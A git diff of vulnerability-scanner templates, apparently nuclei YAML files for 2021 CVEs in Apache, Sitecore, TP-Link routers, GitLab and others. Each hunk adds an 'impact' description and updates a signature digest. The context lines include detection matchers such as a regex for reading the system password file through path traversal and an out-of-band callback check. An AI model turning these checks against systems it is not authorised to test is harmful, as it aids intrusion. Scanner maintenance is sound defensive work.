--- a/http/cves/2021/CVE-2021-41467.yaml
+++ b/http/cves/2021/CVE-2021-41467.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot
   severity: medium
   description: A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502205a0afe2e65252e43598a9f814f49ed92a7c348cef36528c3f247bc0c14d7ccf50221008a878df55e877f67aa00107b9408d1311fdf78e3fd13eaecf92257b77d32480e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210081fbb16741cd549da98a7d4111f4cbf31b6ff18ef03170690592534301e568e00220163691270b2a428d60b173670a7406512482f7b99478930b8b9da21ad8a58dcf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-41569.yaml b/http/cves/2021/CVE-2021-41569.yaml
index 9d8847dc35..b8231993e6 100644
--- a/http/cves/2021/CVE-2021-41569.yaml
+++ b/http/cves/2021/CVE-2021-41569.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: SAS/Internet 9.4 build 1520 and earlier allows local file inclusion. The samples library (included by default) in the appstart.sas file, allows end-users of the application to access the sample.webcsf1.sas program, which contains user-controlled macro variables that are passed to the DS2CSF macro.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Apply the latest security patches or updates provided by SAS to fix the LFI vulnerability in the SAS/Internet 9.4 1520 application.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100f204384bc8473f168bcbdc2ac87e83455848bbcee5c9094eb53e5b75122e596b022100b11db3a3971e2c5b48b468357b7bfe8fa188f55214356ca6edd23ef0b53ba0b0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206c6f967c5fd944ea1b874193ee79d62f97e1307c04510788c7a38c5a7196edbf022072bd1989dfc6eebe70c8ec39187e02abb3c9c1ec1b6e9828418fa35e9b04fdc7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-41648.yaml b/http/cves/2021/CVE-2021-41648.yaml
index 11a65d3290..bdfdb05a13 100644
--- a/http/cves/2021/CVE-2021-41648.yaml
+++ b/http/cves/2021/CVE-2021-41648.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping through the /action.php prId parameter. Using a post request does not sanitize the user input.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a258418ca5771d6e72832249f031489c5ef07a72524d93574ca6e0e9956f0b4502201f61d25c95119babed2c8b68e36430ffb0d569ed1079fa231212a33e8f8d1d33:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009fb61b4131efeaeb8013cf8f72489622d17f59253057c931dd0be23767a02add022074ef8b21e6c9f80178002c6ed3fe47fffcea0d4517f3d1b333f6bd2301eec030:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-41649.yaml b/http/cves/2021/CVE-2021-41649.yaml
index 78f72ea313..81a06bcf17 100644
--- a/http/cves/2021/CVE-2021-41649.yaml
+++ b/http/cves/2021/CVE-2021-41649.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: critical
   description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping System through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100b69cfb4f200f725398a065a4318cbbf6d2815aa2898154728ccbd6af7635bac8022036ad9f2782e53e3da9bb203d471ab5144fb643eb11e4b8424d6d04508b0966b9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220323731aed22f6ff006badfd67df1a905a510ade44214607be27ea92b21ca1d6602200d6be98c8d74e22c55242f46aa40605360b7d9e49ba25e8d0a7c5a12630f709c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-41653.yaml b/http/cves/2021/CVE-2021-41653.yaml
index 48a72ef4e1..30b547e174 100644
--- a/http/cves/2021/CVE-2021-41653.yaml
+++ b/http/cves/2021/CVE-2021-41653.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.
   remediation: Upgrade the firmware to at least version "TL-WR840N(EU)_V5_211109".
   reference:
     - https://k4m1ll0.com/cve-2021-41653.html
@@ -63,4 +65,4 @@ http:
         part: interactsh_request
         words:
           - "User-Agent: {{useragent}}"
-# digest: 490a00463044022002c5af72894bbe5b8e29ed8e531b56198f01008aec24fb1b440251b4c8d686a502205603e278be50cedae501e1bb80a87181bee6a3558c1e79d92ee936b397eb090f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009503acb85d728d41926fb470b45c482b1bed4439cd01bd3ee1f1a1ee04150b1f022100bc4aba61b0b43a0360f64405ebb60c6dba2255fbfceb5f2620d8babfc63a6b29:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-41691.yaml b/http/cves/2021/CVE-2021-41691.yaml
index 11f4a9f084..c7901cff2a 100644
--- a/http/cves/2021/CVE-2021-41691.yaml
+++ b/http/cves/2021/CVE-2021-41691.yaml
@@ -5,6 +5,8 @@ info:
   author: Bartu Utku SARP
   severity: high
   description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
   remediation: |
     Apply the latest security patch or upgrade to a patched version of openSIS Student Information System to mitigate the SQL Injection vulnerability (CVE-2021-41691).
   reference:
@@ -48,5 +50,4 @@ http:
           - 'contains(body_2, "<!-- SQL STATEMENT:") && contains(body_2, "SELECT COUNT(STUDENT_ID)")'
           - 'status_code_2 == 200'
         condition: and
-
-# digest: 4b0a00483046022100d69a704ad325691722917a459e5254a92c6c17b1de1bf9f45e49b81414445ce5022100f9ddad6028eb7b1ad78e82fc59de1d3a40a132b8da744cbf8057af607d694558:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210082396f953ab095de63f089df7860a293f072804b05aa5c978db67caaf2d5919802202fe82b5abfaffc7dd08272100d7846e2fd6fca30dfe0454a7721ca9d696cca7a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-41773.yaml b/http/cves/2021/CVE-2021-41773.yaml
index 6038e8fe14..0076708788 100644
--- a/http/cves/2021/CVE-2021-41773.yaml
+++ b/http/cves/2021/CVE-2021-41773.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and remote code execution.
   remediation: |
     Upgrade Apache to version 2.4.50 or apply the relevant patch provided by the vendor.
   reference:
@@ -61,5 +63,4 @@ http:
         name: LFI
         regex:
           - "root:.*:0:0:"
-
-# digest: 4b0a00483046022100de8497f1c24918a9c7323beae8664ca742c5cbbe3657cab12758caa182e891d1022100fb74960000ce185cdd192c430b79f5f167632783e588f447813ee1a57fe0e4ec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ab104e7a3fee6c1b4ec1efb7ae591c183b60c34914fc7f8075221156c089eea7022100d6099f1b62bbe9668fcf542b18218ab873c62d4201c31a9b5ab60e663392c79d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-41826.yaml b/http/cves/2021/CVE-2021-41826.yaml
index fa8729b5fd..fe87253116 100644
--- a/http/cves/2021/CVE-2021-41826.yaml
+++ b/http/cves/2021/CVE-2021-41826.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: medium
   description: PlaceOS Authentication Service before 1.29.10.0 allows app/controllers/auth/sessions_controller.rb open redirect.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.
   remediation: |
     Apply the latest security patch or update to PlaceOS 1.2109.2 or higher to fix the open redirection vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
           - 302
           - 301
         condition: or
-# digest: 490a0046304402205f76be474169259bbcbc313fa2f59f79c6b8e7d675d8b7e8c5036017238035b80220680fd8f75f17530dbaec9d456fe4415fa03c319388dfc8d51a969e7594b86524:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a9f8dda320b06f7f051a21cdaff2a90ce3e36065c41fec74d2f0e1128d0f0def022100b21ca38a9716d777e2d9604efa7e49df6a9e3bb039d3d9ba01bd4c71374a26ac:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-41878.yaml b/http/cves/2021/CVE-2021-41878.yaml
index ab45db4cf8..0d58028c8b 100644
--- a/http/cves/2021/CVE-2021-41878.yaml
+++ b/http/cves/2021/CVE-2021-41878.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     i-Panel Administration System 2.0 contains a cross-site scripting vulnerability that enables an attacker to execute arbitrary JavaScript code in the browser-based web console.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100e175976e825fc94780dece1a5b63123fcf88fe4f92afa24edb466718d4c61b81022061d432fce271febb1e1b9f345dd1d460078ac5d0ec77b1d7c283ee19f2ad882c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d6de39c37d2bd7803d5453e2521f28ac9c5eb54f6a4429169aad4852d7110e7b0220576fcf91b22ef2afed72949aaa4344370f0a0eb96fd48784411226734451eae2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-4191.yaml b/http/cves/2021/CVE-2021-4191.yaml
index a7a6b23fd8..19daa047a5 100644
--- a/http/cves/2021/CVE-2021-4191.yaml
+++ b/http/cves/2021/CVE-2021-4191.yaml
@@ -5,6 +5,8 @@ info:
   author: zsusac
   severity: medium
   description: An unauthenticated remote attacker can leverage this vulnerability to collect registered GitLab usernames, names, and email addresses.
+  impact: |
+    An attacker can enumerate valid usernames, which can be used for further attacks such as brute-forcing passwords or launching targeted phishing campaigns.
   remediation: |
     Implement rate limiting or CAPTCHA on the GraphQL API to prevent user enumeration.
   reference:
@@ -59,4 +61,4 @@ http:
       - type: json
         json:
           - '.data.users.nodes[].username'
-# digest: 490a0046304402206f0c7ecd334f0405e25dfe4b694f72b668bcf3cae872ca4a3801f1990176ef26022048d9e272a35dc367824465cd8348b01f4815495818400fe0edea8605abcb25e7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022070df74b8dc313eedc7d976ad32ef038d2c0f1fcf0fd45896ad0f47b6d4b4f137022100dddfd34a0663f996848af2234f3ab892afeb8bfdcec6a4838206159995675e2c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-41951.yaml b/http/cves/2021/CVE-2021-41951.yaml
index b4f37014a1..c51ee703cc 100644
--- a/http/cves/2021/CVE-2021-41951.yaml
+++ b/http/cves/2021/CVE-2021-41951.yaml
@@ -5,6 +5,8 @@ info:
   author: coldfish
   severity: medium
   description: ResourceSpace before 9.6 rev 18290 is affected by a reflected cross-site scripting vulnerability in plugins/wordpress_sso/pages/index.php via the wordpress_user parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502203de2fe5b54036c1961d268d6f927f3fe4d459fc4ae695b15ce0e00f9257cae3f022100f7bfcd5a257bd303d6c219a1f2b47a31ca1dd1575bae85fdae8ec20ad6f69489:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022020e091f09bf85317f2fce2728100e0ecfcc59af67f6b6808e58ca7bc20295317022070530642df77acf6e5b9774706a8572651c901cca7e5921cf0dbe36743a1e9ce:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-42013.yaml b/http/cves/2021/CVE-2021-42013.yaml
index cd025df66e..0531444d70 100644
--- a/http/cves/2021/CVE-2021-42013.yaml
+++ b/http/cves/2021/CVE-2021-42013.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code and gain unauthorized access to sensitive information.
   remediation: Upgrade to Apache HTTP Server 2.4.51 or later.
   reference:
     - https://httpd.apache.org/security/vulnerabilities_24.html
@@ -64,4 +66,4 @@ http:
         name: LFI
         regex:
           - "root:.*:0:0:"
-# digest: 4b0a0048304602210094f7d017728a1adec76e09b90d81c6a8b3f24ccf14bc01ef2df06a953c0f07a4022100ece185c07466f9a8998f012bcfb9dee7b6a1b41ae441fa7836e8ae86aa9bbb7e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022012d99795e7349329b17489d2057518a4eb89ce2ff404ddf65e575b7a7605aa44022100ff9d041d9d809f36d4ebefebe1d9565d98052598cbd4a9ac80d1cfb96183bdc7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-42063.yaml b/http/cves/2021/CVE-2021-42063.yaml
index 3378d85706..f25f10a618 100644
--- a/http/cves/2021/CVE-2021-42063.yaml
+++ b/http/cves/2021/CVE-2021-42063.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     SAP Knowledge Warehouse 7.30, 7.31, 7.40, and 7.50 contain a reflected cross-site scripting vulnerability via the usage of one SAP KW component within a web browser.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Upgrade to a patched version of SAP Knowledge Warehouse (>=7.5.1) to mitigate the XSS vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022007954bb76dbd44a5a81bf2a0ed906ed47a0d3f1a29295c2c4495513be479117802210082fe7a429fcf88dbecf72a07a6b3f85b15a6cd22c8f0068fd60f4f1853c7963b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204da0ef539b981f27b80ee46a7b1da7dabc3e4c3d3ee1edaefe0b2ce2f36650dc0220107cfb00c67c1cf34f8044bfbe47c43721d456956035a42ca9c30e6478556e22:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-42071.yaml b/http/cves/2021/CVE-2021-42071.yaml
index 9090a62776..6cf128dbde 100644
--- a/http/cves/2021/CVE-2021-42071.yaml
+++ b/http/cves/2021/CVE-2021-42071.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: Visual Tools DVR VX16 4.2.28.0 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the affected system.
   remediation: |
     Apply the latest security patch or update provided by the vendor to fix the command injection vulnerability in the Visual Tools DVR VX16 4.2.28.0 device.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402200817f17fef50a37b888aa4af4c34aae3c70e3846d4b0780e7242435eee0b4e980220073d2e37d348c2308c8148a90367e3494ade3460cce38e1a725dfe85e672254a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a479b01a7bf7e89841ec6775bd12ebb82d151c577e57e41d292e226fa7f7010c02202947c8b00d6356098bdd7a55186648ccd717c3d1b2c53031641c9279fd518f88:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-42192.yaml b/http/cves/2021/CVE-2021-42192.yaml
index 675c0e4063..cfcf37e12d 100644
--- a/http/cves/2021/CVE-2021-42192.yaml
+++ b/http/cves/2021/CVE-2021-42192.yaml
@@ -5,6 +5,8 @@ info:
   author: rschio
   severity: high
   description: KONGA 0.14.9 allows attackers to set higher privilege users to full administration access. The attack vector is a crafted condition, as demonstrated by the /api/user/{ID} at ADMIN parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to escalate their privileges and gain unauthorized access to sensitive information or perform unauthorized actions.
   remediation: |
     Upgrade to a patched version of KONGA or apply the necessary security patches provided by the vendor.
   reference:
@@ -85,4 +87,4 @@ http:
           - '"token":"(.*)"'
         internal: true
         part: body
-# digest: 4a0a00473045022024ce8b6d1d047c1f5ad6a7edf412ca974a9c4af098578e08ce2ed5f5cda848e4022100a44e1a325fc5aa2b87285d618c5c9b2b62f7edc0ad2324d5ca73f5372cc9aeb6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a3f41e38ca2938aaf9bda9531896bbb146ccba7af0e921f0f30fb6e6788833ab022100a88486f92feb6877994ae6b4b075c6c3446c3d654f8274e0358b3c92788860c3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-42237.yaml b/http/cves/2021/CVE-2021-42237.yaml
index 3a730797b1..956cf576c6 100644
--- a/http/cves/2021/CVE-2021-42237.yaml
+++ b/http/cves/2021/CVE-2021-42237.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: critical
   description: Sitecore XP 7.5 to Sitecore XP 8.2 Update 7 is vulnerable to an insecure deserialization attack where remote commands can be executed by an attacker with no authentication or special configuration required.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: For Sitecore XP 7.5.0 - Sitecore XP 7.5.2, use one of the following solutions- - Upgrade your Sitecore XP instance to Sitecore XP 9.0.0 or higher. - Consider the necessity of the Executive Insight Dashboard and remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. - Upgrade your Sitecore XP instance to Sitecore XP 8.0.0 - Sitecore XP 8.2.7 version and apply the solution below. - For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
   reference:
     - https://blog.assetnote.io/2021/11/02/sitecore-rce/
@@ -119,4 +121,4 @@ http:
         part: body
         words:
           - "System.ArgumentNullException"
-# digest: 4a0a0047304502202a1eba981e2829ffac8881bbf2fa15b9980fde82a039b5669c4237a10eed0025022100eacd8a744daed16c110f3234a825a2506ab2d12cc291c7fee91e1b8ad9bcb863:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e7b416acfaf34bcd9fbd747e4cf9115de5b5a40041e2e3c7a552b0ac13d43aa502204d21ae6a048f1a778a66c8322a6ca7aa37709fed507623744de9933e346be4c2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-42258.yaml b/http/cves/2021/CVE-2021-42258.yaml
index c5a1afc693..6edbcf46ec 100644
--- a/http/cves/2021/CVE-2021-42258.yaml
+++ b/http/cves/2021/CVE-2021-42258.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: critical
   description: BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 allows SQL injection for unauthenticated remote code execution. Successful exploitation can include the ability to execute arbitrary code as MSSQLSERVER$ via xp_cmdshell.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.
   remediation: |
     Apply the latest security patches and updates provided by the vendor to fix the SQL Injection vulnerability in the BillQuick Web Suite.
   reference:
@@ -68,4 +70,4 @@ http:
         xpath:
           - "/html/body/form/div/input[@id='__EVENTVALIDATION']"
         attribute: value
-# digest: 490a00463044022063eb5dd8a8626817dcacbe3b8646a2517581029b9e7679b15ae30597e5e7bd2a02200a38ff633b7db46847706c56c00d30774d33bee52b44848c921aab31c92b9e0f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022012eb4b7a797cf33fc51008e1a86462d43051906e792722f4192d6598c50e5f5d02205177faed7ea14ae319190259a165cd9faf3566886d8012239e6f82a30d76776c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-42551.yaml b/http/cves/2021/CVE-2021-42551.yaml
index 4ee7b3472a..aa45f2a735 100644
--- a/http/cves/2021/CVE-2021-42551.yaml
+++ b/http/cves/2021/CVE-2021-42551.yaml
@@ -5,6 +5,8 @@ info:
   author: compr00t
   severity: medium
   description: NetBiblio WebOPAC before 4.0.0.320 is affected by a reflected cross-site scripting vulnerability in its Wikipedia module through /NetBiblio/search/shortview via the searchTerm parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -55,4 +57,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502210087e8f0f7efcd1473c137845e751cc1350573c323a09134b63eb50887800d2fe2022068afa741628f1f9f9087884d4176c0f2bd12afb0ca0602529ccf2442f9ffb95b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fdf0d519fc2cabe624dd913081965e0a74e316383109e83999b6be31abc9635c022100fb7ffad54fdfe597dc31d8d121f75445b1c42c2ee059aaad42d176d59b7fd743:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-42565.yaml b/http/cves/2021/CVE-2021-42565.yaml
index 0439623dd9..d810f28903 100644
--- a/http/cves/2021/CVE-2021-42565.yaml
+++ b/http/cves/2021/CVE-2021-42565.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot
   severity: medium
   description: myfactory.FMS before 7.1-912 allows cross-site scripting via the UID parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402206863105162490e2a16c5636b4779bde80237e269376bd0955c9e563e1c88477e02206a4689002b449fa3d80ff40226a9f567f203711745eb7f28667b41f803f99365:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d27c9125cdae9b85ed32dbb08942e2121beb2062fc9fff10d8b1c183f3c16471022100b2cde51af4f81b9cc606b049bdde40f1eff471770278cfa6d513cac80bc8736c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-42566.yaml b/http/cves/2021/CVE-2021-42566.yaml
index 8d02e15f2c..43133d89c8 100644
--- a/http/cves/2021/CVE-2021-42566.yaml
+++ b/http/cves/2021/CVE-2021-42566.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot
   severity: medium
   description: myfactory.FMS before 7.1-912 allows cross-site scripting via the Error parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100e8acae80430e5912f6b43e0dbbf6a544d6a84db4932e0e8436dd36aa399898d40221008614b9d09034adc6662537d5ec4e942d552011b7f574184442c44e49f8d19934:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100990c542e5fcb8fd33e54553bd7396cbdddde1c2d9af7734c6769f3bce3117235022029f35d72c0151c1124a135a3eaf6f9acec86f53ba11c779b70f0255204856b72:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-42567.yaml b/http/cves/2021/CVE-2021-42567.yaml
index 0542b88ff9..29b8ca8071 100644
--- a/http/cves/2021/CVE-2021-42567.yaml
+++ b/http/cves/2021/CVE-2021-42567.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: medium
   description: Apereo CAS through 6.4.1 allows cross-site scripting via POST requests sent to the REST API endpoints.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, data theft, or defacement.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 401
-# digest: 490a00463044022069888650dfdf90b8c03d1812f6efbccca0a2bd45de4b7cba5f20736641eda0e302203eaf13b8e6b748b88c52794c421f677dba983957fe1264ef4537d54156951514:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205f6830b6001b612f4c8fd2ab85b5f747f7a11e3757b3c0cbfe9ed59e1ac8b8960221008d9d7885d50abfbea7971fa3c75176357811bba4d6c73111885ba8e80ce7eff7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-42627.yaml b/http/cves/2021/CVE-2021-42627.yaml
index d06f1f84d4..8e825358f1 100644
--- a/http/cves/2021/CVE-2021-42627.yaml
+++ b/http/cves/2021/CVE-2021-42627.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     D-Link DIR-615 devices with firmware 20.06 are susceptible to unauthorized access. An attacker can access the WAN configuration page wan.htm without authentication, which can lead to disclosure of WAN settings, data modification, and/or other unauthorized operations.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to the router, potentially compromising the network and exposing sensitive information.
   remediation: |
     Apply the latest firmware update provided by D-Link to fix the vulnerability and ensure strong and unique passwords are set for router administration.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100bfa0fd5526c8e6cdf41572f8b638a3973a9b2995abecdbefdeb4726e6cc8237502207135e67079813c6760f198846e398668fa9ad5fc174605f40f0a4d83268d12cb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f391ed0e4dab7d0181053c9a9a08a96a3de73a772230700d92ffa4938ced65ee022100d1ccb34d3bd0ea82e53b9e3c9bfcd4f43ab29eb7512a1c9933615cb7795a4011:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-42663.yaml b/http/cves/2021/CVE-2021-42663.yaml
index 2e387e0a5f..60f1eb57ea 100644
--- a/http/cves/2021/CVE-2021-42663.yaml
+++ b/http/cves/2021/CVE-2021-42663.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Sourcecodester Online Event Booking and Reservation System 2.3.0 contains a cross-site scripting vulnerability in PHP/MySQL via the msg parameter to /event-management/index.php. An attacker can leverage this vulnerability in order to change the visibility of the website. Once the target user clicks on a given link, the content of the HTML code of the attacker's choice displays.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.
